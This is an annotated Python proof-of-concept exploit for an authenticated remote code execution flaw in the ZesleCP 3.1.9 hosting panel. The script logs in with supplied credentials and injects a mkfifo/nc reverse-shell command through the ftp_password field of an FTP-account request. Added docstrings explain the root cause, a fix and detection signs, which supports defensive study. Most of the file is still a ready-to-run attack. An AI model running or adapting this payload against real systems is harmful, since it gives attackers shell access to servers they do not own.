Created
August 27, 2021 13:21
ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 ) | |
# author: twitter.com/numanturle | |
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD | |
# https://www.youtube.com/watch?v=5lTDTEBVq-0 | |
import argparse,requests,warnings,json,random,string | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
from cmd import Cmd | |
# Silence the warning urllib3 raises for unverified HTTPS requests. The
# requests in exploit() are sent with verify=False, so without this filter
# every call would print an InsecureRequestWarning.
warnings.simplefilter(action='ignore', category=InsecureRequestWarning)
def init():
    """Parse the command line and pass the resulting namespace to exploit().

    The three options -u/--host, -l/--login and -p/--password are all
    mandatory; argparse exits with a usage message if one is missing.
    """
    cli = argparse.ArgumentParser(
        description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )'
    )
    # (short flag, long flag, help text) for each required string option.
    required_options = (
        ('-u', '--host', 'Host'),
        ('-l', '--login', 'Username'),
        ('-p', '--password', 'Password'),
    )
    for short_flag, long_flag, help_text in required_options:
        cli.add_argument(short_flag, long_flag, help=help_text, type=str, required=True)
    # NOTE: the panel password arrives through argv, so it is visible in the
    # local process list and shell history while the script runs.
    exploit(cli.parse_args())
def exploit(args):
    """Proof of concept for the authenticated command injection in ZesleCP 3.1.9.

    Logs in to the panel on port 2087 with the supplied credentials, then
    posts an FTP-account creation request to /core/ftp whose ``ftp_password``
    value carries shell metacharacters. Progress is printed to stdout and
    nothing is returned.

    Args:
        args: parsed command-line namespace; ``host``, ``login`` and
            ``password`` are read from it.

    Defender notes:
        * Root cause (inferred from the payload shape, the server side is not
          shown here): the password value closes a single-quoted string and
          appends further commands, which suggests the panel interpolates the
          FTP password into a quoted shell command line. The durable fix is
          server-side: hand the password to the account tool as a separate
          argument or via a library call instead of a shell string, and
          reject quote and command-separator characters on input.
        * Detection: POST requests to /core/ftp whose ``ftp_password``
          contains ``'``, ``;`` or ``|``; a FIFO appearing at /tmp/f; /bin/sh
          or nc started as a descendant of the panel's own service process.
        * The request only works after a successful /login, so limiting who
          holds panel credentials and who can reach port 2087 narrows exposure.
    """
    # Address and port that the injected command line is told to connect to.
    listen_ip = "0.0.0.0"
    listen_port = 1337
    session = requests.Session()
    target = "https://{}:2087".format(args.host)
    username = args.login
    password = args.password
    print("[+] Target {}".format(target))
    # verify=False disables TLS certificate validation, so the credentials are
    # sent without authenticating the server they go to.
    login = session.post(target+"/login", verify=False, json={"username":username,"password":password})
    # No status-code or content-type check: a reply that is not JSON raises here.
    login_json = json.loads(login.content)
    if login_json["success"]:
        # Snapshot of the session cookies; never read again in this function
        # (the Session object already carries them on later requests).
        session_hand_login = session.cookies.get_dict()
        print("[+] Login successfully")
        print("[+] Creating ftp account")
        # Random 10-character lowercase/digit name for the FTP account.
        ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))
        print("[+] Username : {}".format(ftp_username))
        print("[+] Send payload....")
        # The password field is the injection point: the leading 1337' ends a
        # quoted string, the ';'-separated commands follow, and the trailing
        # echo ' re-balances the closing quote.
        payload = {
            "ftp_user": ftp_username,
            "ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port)
        }
        try:
            # The response is stored but never inspected.
            feth_weblist = session.post(target+"/core/ftp", verify=False, json=payload, timeout=3)
        except requests.exceptions.ReadTimeout:
            # A read timeout is deliberately ignored -- presumably because the
            # request does not return while the injected command is running.
            pass
        # Printed unconditionally: neither the HTTP status nor the response
        # body is checked, so this line does not prove the request was accepted.
        print("[+] Successful")
    else:
        print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))
# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    init()